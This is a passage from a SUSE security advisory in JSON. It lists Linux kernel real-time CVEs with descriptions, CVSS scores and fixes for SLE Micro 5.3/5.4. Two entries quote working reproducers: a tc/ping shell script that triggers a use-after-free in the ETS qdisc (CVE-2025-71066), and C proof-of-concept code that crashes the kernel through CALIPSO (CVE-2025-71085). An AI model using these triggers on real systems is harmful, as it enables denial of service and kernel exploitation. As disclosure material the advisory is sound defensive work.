"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-40139"
},
{
"cve": "CVE-2025-40242",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40242"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix unlikely race in gdlm_put_lock\n\nIn gdlm_put_lock(), there is a small window of time in which the\nDFL_UNMOUNT flag has been set but the lockspace hasn\u0027t been released,\nyet. In that window, dlm may still call gdlm_ast() and gdlm_bast().\nTo prevent it from dereferencing freed glock objects, only free the\nglock if the lockspace has actually been released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40242",
"url": "https://www.suse.com/security/cve/CVE-2025-40242"
},
{
"category": "external",
"summary": "SUSE Bug 1255075 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "external",
"summary": "SUSE Bug 1255076 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-40242"
},
{
"cve": "CVE-2025-68312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusbnet: Prevents free active kevent\n\nThe root cause of this issue are:\n1. When probing the usbnet device, executing usbnet_link_change(dev, 0, 0);\nput the kevent work in global workqueue. However, the kevent has not yet\nbeen scheduled when the usbnet device is unregistered. Therefore, executing\nfree_netdev() results in the \"free active object (kevent)\" error reported\nhere.\n\n2. Another factor is that when calling usbnet_disconnect()-\u003eunregister_netdev(),\nif the usbnet device is up, ndo_stop() is executed to cancel the kevent.\nHowever, because the device is not up, ndo_stop() is not executed.\n\nThe solution to this problem is to cancel the kevent before executing\nfree_netdev().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68312",
"url": "https://www.suse.com/security/cve/CVE-2025-68312"
},
{
"category": "external",
"summary": "SUSE Bug 1255171 for CVE-2025-68312",
"url": "https://bugzilla.suse.com/1255171"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-68312"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our 
class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc 
del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceiving a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps://lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23004",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23004"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndst: fix races in rt6_uncached_list_del() and rt_del_uncached_list()\n\nsyzbot was able to crash the kernel in rt6_uncached_list_flush_dev()\nin an interesting way [1]\n\nCrash happens in list_del_init()/INIT_LIST_HEAD() while writing\nlist-\u003eprev, while the prior write on list-\u003enext went well.\n\nstatic inline void INIT_LIST_HEAD(struct list_head *list)\n{\n\tWRITE_ONCE(list-\u003enext, list); // This went well\n\tWRITE_ONCE(list-\u003eprev, list); // Crash, @list has been freed.\n}\n\nIssue here is that rt6_uncached_list_del() did not attempt to lock\nul-\u003elock, as list_empty(\u0026rt-\u003edst.rt_uncached) returned\ntrue because the WRITE_ONCE(list-\u003enext, list) happened on the other CPU.\n\nWe might use list_del_init_careful() and list_empty_careful(),\nor make sure rt6_uncached_list_del() always grabs the spinlock\nwhenever rt-\u003edst.rt_uncached_list has been set.\n\nA similar fix is needed for IPv4.\n\n[1]\n\n BUG: KASAN: slab-use-after-free in INIT_LIST_HEAD include/linux/list.h:46 [inline]\n BUG: KASAN: slab-use-after-free in list_del_init include/linux/list.h:296 [inline]\n BUG: KASAN: slab-use-after-free in rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline]\n BUG: KASAN: slab-use-after-free in rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020\nWrite of size 8 at addr ffff8880294cfa78 by task kworker/u8:14/3450\n\nCPU: 0 UID: 0 PID: 3450 Comm: kworker/u8:14 Tainted: G L syzkaller #0 PREEMPT_{RT,(full)}\nTainted: [L]=SOFTLOCKUP\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: netns cleanup_net\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n INIT_LIST_HEAD include/linux/list.h:46 [inline]\n list_del_init 
include/linux/list.h:296 [inline]\n rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline]\n rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020\n addrconf_ifdown+0x143/0x18a0 net/ipv6/addrconf.c:3853\n addrconf_notify+0x1bc/0x1050 net/ipv6/addrconf.c:-1\n notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85\n call_netdevice_notifiers_extack net/core/dev.c:2268 [inline]\n call_netdevice_notifiers net/core/dev.c:2282 [inline]\n netif_close_many+0x29c/0x410 net/core/dev.c:1785\n unregister_netdevice_many_notify+0xb50/0x2330 net/core/dev.c:12353\n ops_exit_rtnl_list net/core/net_namespace.c:187 [inline]\n ops_undo_list+0x3dc/0x990 net/core/net_namespace.c:248\n cleanup_net+0x4de/0x7b0 net/core/net_namespace.c:696\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246\n \u003c/TASK\u003e\n\nAllocated by task 803:\n kasan_save_stack mm/kasan/common.c:57 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:78\n unpoison_slab_object mm/kasan/common.c:340 [inline]\n __kasan_slab_alloc+0x6c/0x80 mm/kasan/common.c:366\n kasan_slab_alloc include/linux/kasan.h:253 [inline]\n 